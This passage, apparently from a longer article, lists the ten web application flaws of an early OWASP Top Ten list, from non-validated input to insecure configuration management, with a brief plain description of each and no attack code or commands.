The ten flaws in the OWASP list are:

1.  Non-validated input.

Attackers could use non-validated data to reach backend components.

2.  Broken access control.

Improper application of restrictions on authenticated users could give attackers access to other accounts or use unauthorized functions.

3.  Broken authentication and session management.

Account credentials and session tokens are not properly protected, allowing attackers to compromise passwords, keys, session cookies or tokens, and assume the identities of other users.

4.  Cross-site scripting.

This allows the web application to be used to transport an attack on the end user's browser, leading to the disclosure of the end user's session token or spoof content to fool the user.

5.  Buffer overflows.

Web application components written in languages that do not properly validate input can crash and in some cases, be used to take control of a process.

6.  Injection flaws.

Web applications pass parameters when they access external systems or the local OS. If malicious commands are embedded in the parameters, the external system may execute those commands on behalf of the Web application.

7.  Improper error handling.

This can lead to attackers gaining detailed system information or causing denial of service.

8.  Insecure storage.

Web applications that use cryptographic functions to protect information and credentials have proven difficult to code properly, resulting in weak protection.

9.  Denial of service.

As mentioned, attackers use up Web application resources to the point where other legitimate users can no longer access or use the application. Attackers can also block user accounts or cause application failures.

10.  Insecure configuration management.

Having a strong configuration standard is critical.